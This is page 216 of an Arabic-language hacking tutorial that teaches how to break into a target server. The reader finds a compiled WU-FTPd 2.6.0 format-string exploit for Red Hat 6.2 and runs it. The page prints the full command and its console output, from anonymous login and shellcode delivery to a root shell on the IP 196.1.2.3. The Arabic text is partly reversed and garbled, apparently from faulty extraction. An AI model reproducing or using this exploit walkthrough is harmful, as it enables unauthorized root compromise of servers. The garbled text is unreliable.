Page 216 - بسم الله الرحمن الرحيم
P. 216
.Guest login ok, access restrictions apply 230
.Remote system type is UNIX
.Using binary mode to transfer files
ftp>by
#~:root@IcEr
.wu-2.6.0 م ده تصقدر تصعرف ان الفيرجهين الموجهوده هي.من الكل
(; و كانت اعمليه ناجهحهanonymous و ايضا احنا حاولنا نخش كمجهولين
####### صلي على الحبيب المختار#######
-: مش فاكر المهم انها اهم ختطوه8 او7
.FTPd احصل على الكسبلويت بتاعه الفيرجهين ديه من
( )اللي يعمل سيرش ميتوهش
wuftpd2600.c و لتكن
red hat 6.2 م تصشغيل معين و ليكن.المهم لو شفت السورس كود بتاعها حتلقي انها متكوده عشان نظا
م التشغيل ده.م لو كان الموقع المستهدف بيعمل على نظا.و يا سل
كده يبقى كل اللي تصعمله انك تصعمل كومبايل للثغره دي و بشغلها على سيرفر
root access الموقع المستهدف و كده حيديك
(-;
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3
Target: 196.1.2.3 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1)
from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
..loggin into system
USER ftp
.Guest login ok, send your complete e-mail address as password 331
<PASS <shellcode
Next time please use your e-mail address as your password-230
for example: icer@ae.net -230
.Guest login ok, access restrictions apply 230
STEP 2 : Skipping, magic number already exists:
[[87,01:03,02:01,01:02,04
STEP 3 : Checking if we can reach our return address by format string
(STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now
.STEP 5 : Sending code.. this will take about 10 seconds
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686
unknown
(uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp
!Bang! You have root
شوف المر ده.. طبعا انا نسيت امر الكومبايل
man gcc
بكل الخيارات اللي معاه.. و هوه حيديلك معلومات كامله عن امر الكومبايل
(: كده يبقى انا كده عملت اللي عليه
محدش يسالني باه بعد كده و يقولي ياواد يا ايسر اعمل ايه
search..U will find what U wanna
..بعض الثغرات بتحتاجهه.. محدش سالني اعمل بالنت كات بعد كده.. اه نسيت... طيب
لكن لو كانت الخاصيه.. الموجهودهannonymous لو لحظت اننا استغلينا ختاصيه ال
216
